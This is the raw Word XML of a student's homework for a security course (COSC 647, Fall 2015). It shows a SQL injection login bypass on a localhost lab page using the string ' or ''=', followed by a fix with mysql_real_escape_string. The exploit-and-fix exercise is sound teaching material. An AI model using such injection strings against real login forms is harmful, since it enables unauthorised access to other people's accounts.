          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> that can allow the user to gain access without the correct password</w:t>
      </w:r>
      <w:r w:rsidR="002F2F26" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F2F26" w:rsidRPr="004D3FD8" w:rsidRDefault="002F2F26" w:rsidP="002F2F26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F2F26" w:rsidRPr="004D3FD8" w:rsidRDefault="002F2F26" w:rsidP="002F2F26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Open the web application</w:t>
      </w:r>
      <w:r w:rsidR="00BD33F2" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> in Firefox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD33F2" w:rsidRPr="004D3FD8" w:rsidRDefault="00BD33F2" w:rsidP="00BD33F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>http://localhost/Snyder_HW_03_05_login.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F2F26" w:rsidRPr="004D3FD8" w:rsidRDefault="002F2F26" w:rsidP="002F2F26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Update the “</w:t>
      </w:r>
      <w:r w:rsidR="00BD33F2" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00BD33F2" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">and “Password” </w:t>
      </w:r>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>field</w:t>
      </w:r>
      <w:r w:rsidR="00BD33F2" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidR="00195CCA" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>the following exploit string</w:t>
      </w:r>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00195CCA" w:rsidRPr="004D3FD8" w:rsidRDefault="00195CCA" w:rsidP="00195CCA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00BD33F2" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> or ‘’=’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F2F26" w:rsidRPr="004D3FD8" w:rsidRDefault="00BD33F2" w:rsidP="00195CCA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Press “Log-in”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00195CCA" w:rsidRPr="004D3FD8" w:rsidRDefault="00195CCA" w:rsidP="00BD33F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verify Sal</w:t>
      </w:r>
      <w:r w:rsidR="00BD33F2" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0072520D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(or the first entry in the database) </w:t>
      </w:r>
      <w:r w:rsidR="00BD33F2" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>was logged in without using the correct password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00202636" w:rsidRPr="004D3FD8" w:rsidRDefault="00202636" w:rsidP="00202636">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>File names: Snyder_HW_0</w:t>
      </w:r>
      <w:r w:rsidR="00195CCA" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>_0</w:t>
      </w:r>
      <w:r w:rsidR="00195CCA" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00BD33F2" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>_exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BD33F2" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>png</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Snyder_HW_0</w:t>
      </w:r>
      <w:r w:rsidR="00195CCA" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>_0</w:t>
      </w:r>
      <w:r w:rsidR="00195CCA" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00BD33F2" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>_exploit_msg</w:t>
      </w:r>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BD33F2" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>png</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00202636" w:rsidRPr="00202636" w:rsidRDefault="00202636" w:rsidP="00202636">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00202636" w:rsidRDefault="00202636" w:rsidP="00202636">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Correct the flaw in the previous problem by correctly sanitizing the input.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00195CCA" w:rsidRPr="004D3FD8" w:rsidRDefault="00202636" w:rsidP="00202636">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidR="00195CCA" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>web application, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F17A48" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>user_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00195CCA" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00195CCA" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>is now sanitized</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00195CCA" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00195CCA" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>mysql_real_escape_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00195CCA" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">. This means even a specially crafted exploit string will not </w:t>
      </w:r>
      <w:r w:rsidR="00F17A48" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>allow the user to gain access without the correct password</w:t>
      </w:r>
      <w:r w:rsidR="00195CCA" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00195CCA" w:rsidRPr="004D3FD8" w:rsidRDefault="00195CCA" w:rsidP="00195CCA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F17A48" w:rsidRPr="004D3FD8" w:rsidRDefault="00F17A48" w:rsidP="00F17A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Edit Snyder_HW_03_05_login.html to use the fixed sign</w:t>
      </w:r>
      <w:r w:rsidR="004D3FD8" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>in file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F17A48" w:rsidRPr="004D3FD8" w:rsidRDefault="00F17A48" w:rsidP="00F17A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>vi Snyder_HW_03_05_login.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F17A48" w:rsidRPr="004D3FD8" w:rsidRDefault="00F17A48" w:rsidP="00F17A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Find: Snyder_HW_03_05_signin.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F17A48" w:rsidRPr="004D3FD8" w:rsidRDefault="00F17A48" w:rsidP="00F17A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Change to: Snyder_HW_03_07_signin_fixed.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F17A48" w:rsidRPr="004D3FD8" w:rsidRDefault="00F17A48" w:rsidP="00F17A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Open the web application in Firefox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F17A48" w:rsidRPr="004D3FD8" w:rsidRDefault="00F17A48" w:rsidP="00F17A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>http://localhost/Snyder_HW_03_05_login.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F17A48" w:rsidRPr="004D3FD8" w:rsidRDefault="00F17A48" w:rsidP="00F17A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Update the “User” and “Password” fields with the following exploit string:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F17A48" w:rsidRPr="004D3FD8" w:rsidRDefault="00F17A48" w:rsidP="00F17A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>‘ or ‘’=’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F17A48" w:rsidRPr="004D3FD8" w:rsidRDefault="00F17A48" w:rsidP="00F17A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Press “Log-in”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00195CCA" w:rsidRPr="004D3FD8" w:rsidRDefault="00F17A48" w:rsidP="00F17A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verify nobody was logged in (Sal or Mal)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00202636" w:rsidRPr="004D3FD8" w:rsidRDefault="00195CCA" w:rsidP="00195CCA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>File names: Snyder_HW_03_</w:t>
      </w:r>
      <w:r w:rsidR="00202636" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00F17A48" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>_signing_fixed</w:t>
      </w:r>
      <w:r w:rsidR="00202636" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F17A48" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r w:rsidR="00202636" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>; Snyder_HW_0</w:t>
      </w:r>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00202636" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>_0</w:t>
      </w:r>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00F17A48" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>_exploit_fix</w:t>
      </w:r>
      <w:r w:rsidR="00202636" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F17A48" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00202636" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00202636" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Snyder_HW_0</w:t>
      </w:r>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00202636" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>_0</w:t>
      </w:r>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00F17A48" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>_exploit_fix_msg</w:t>
      </w:r>
      <w:r w:rsidR="00202636" w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004D3FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00202636" w:rsidRPr="00202636" w:rsidRDefault="00202636" w:rsidP="00875543">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00202636" w:rsidRPr="0020263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315" w:rsidRDefault="00797315" w:rsidP="000E701D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00797315" w:rsidRDefault="00797315" w:rsidP="000E7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711494"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w:rsidR="000E701D" w:rsidRDefault="000E701D">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00812EE3">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="000E701D" w:rsidRDefault="000E70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315" w:rsidRDefault="00797315" w:rsidP="000E701D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00797315" w:rsidRDefault="00797315" w:rsidP="000E7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01D" w:rsidRDefault="000E701D" w:rsidP="000E701D">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:t>COSC 647 – Fall 2015 – Homework #</w:t>
    </w:r>
    <w:r w:rsidR="00202636">
      <w:t>3</w:t>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> – Mary Sny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79A3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83B06A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35E6D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AFC0C8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2516C4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="50DE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50378"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83B06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A4068"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="104EE35A"/>
    <w:lvl w:ilvl="0" w:tplc="D3CE0E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F7900"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A91E7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55C62"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DB38AC86"/>
    <w:lvl w:ilvl="0" w:tplc="13E228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9B5FF6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83B06A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C00D57"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="586C94F2"/>
    <w:lvl w:ilvl="0" w:tplc="98B4C6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E0AA0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AEEE5C32"/>
    <w:lvl w:ilvl="0" w:tplc="FCD051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22309"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="96467410"/>
    <w:lvl w:ilvl="0" w:tplc="4A7E44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43A54"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BA68D5FA"/>
    <w:lvl w:ilvl="0" w:tplc="D3CE0E0A">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42131"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A91E71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C34AB0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C7877DA"/>
    <w:lvl w:ilvl="0" w:tplc="090C554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4"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="12"/>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9D1"/>
    <w:rsid w:val="0002761A"/>
    <w:rsid w:val="00032D27"/>
    <w:rsid w:val="000517ED"/>
    <w:rsid w:val="00081D7A"/>
    <w:rsid w:val="00082FF3"/>
    <w:rsid w:val="000A24F9"/>
    <w:rsid w:val="000E2B24"/>
    <w:rsid w:val="000E3DE8"/>
    <w:rsid w:val="000E701D"/>
    <w:rsid w:val="001805A6"/>
    <w:rsid w:val="00195CCA"/>
    <w:rsid w:val="00202636"/>
    <w:rsid w:val="00203E5F"/>
    <w:rsid w:val="002456AD"/>
    <w:rsid w:val="00265117"/>
    <w:rsid w:val="00290624"/>
    <w:rsid w:val="00293098"/>
    <w:rsid w:val="002C670D"/>
    <w:rsid w:val="002F2F26"/>
    <w:rsid w:val="00323E18"/>
    <w:rsid w:val="00333D1D"/>
    <w:rsid w:val="003A5779"/>
    <w:rsid w:val="003A7A3E"/>
    <w:rsid w:val="003E70DD"/>
    <w:rsid w:val="0041322C"/>
    <w:rsid w:val="00417092"/>
    <w:rsid w:val="004304C0"/>
    <w:rsid w:val="00473B89"/>
    <w:rsid w:val="004D3FD8"/>
    <w:rsid w:val="00505348"/>
    <w:rsid w:val="0051628A"/>
    <w:rsid w:val="00537CAF"/>
    <w:rsid w:val="00557B93"/>
    <w:rsid w:val="005815F3"/>
    <w:rsid w:val="005D0CE6"/>
    <w:rsid w:val="00632BDA"/>
    <w:rsid w:val="00644326"/>
    <w:rsid w:val="0065271E"/>
    <w:rsid w:val="00653471"/>
    <w:rsid w:val="00653BF0"/>
    <w:rsid w:val="00656F26"/>
    <w:rsid w:val="006641D8"/>
    <w:rsid w:val="00680EA1"/>
    <w:rsid w:val="007040EF"/>
    <w:rsid w:val="007139D1"/>
    <w:rsid w:val="0072520D"/>
    <w:rsid w:val="00766637"/>
    <w:rsid w:val="0078690E"/>
    <w:rsid w:val="00797315"/>
    <w:rsid w:val="007A67CD"/>
    <w:rsid w:val="007B346E"/>
    <w:rsid w:val="00802C7D"/>
    <w:rsid w:val="00812EE3"/>
    <w:rsid w:val="00875543"/>
    <w:rsid w:val="008950C5"/>
    <w:rsid w:val="008B4850"/>
    <w:rsid w:val="008B5CF4"/>
    <w:rsid w:val="00904F48"/>
    <w:rsid w:val="00932C98"/>
    <w:rsid w:val="009B0405"/>
    <w:rsid w:val="009C0A08"/>
    <w:rsid w:val="00A25106"/>
    <w:rsid w:val="00A513D4"/>
    <w:rsid w:val="00A73496"/>
    <w:rsid w:val="00A97730"/>
    <w:rsid w:val="00AB7FC6"/>
    <w:rsid w:val="00AF4D3D"/>
    <w:rsid w:val="00B440BC"/>
    <w:rsid w:val="00B47E57"/>
    <w:rsid w:val="00B541C1"/>
    <w:rsid w:val="00B72E01"/>
    <w:rsid w:val="00B85EDA"/>
    <w:rsid w:val="00B908E6"/>
    <w:rsid w:val="00BA6E9D"/>
    <w:rsid w:val="00BB38E6"/>
    <w:rsid w:val="00BD33F2"/>
    <w:rsid w:val="00BE00B1"/>
    <w:rsid w:val="00C32A56"/>
    <w:rsid w:val="00C7278B"/>
    <w:rsid w:val="00C852AB"/>
    <w:rsid w:val="00C91CC0"/>
    <w:rsid w:val="00CD2A25"/>
    <w:rsid w:val="00D13CC0"/>
    <w:rsid w:val="00D3102C"/>
    <w:rsid w:val="00D36C3A"/>
    <w:rsid w:val="00D65157"/>
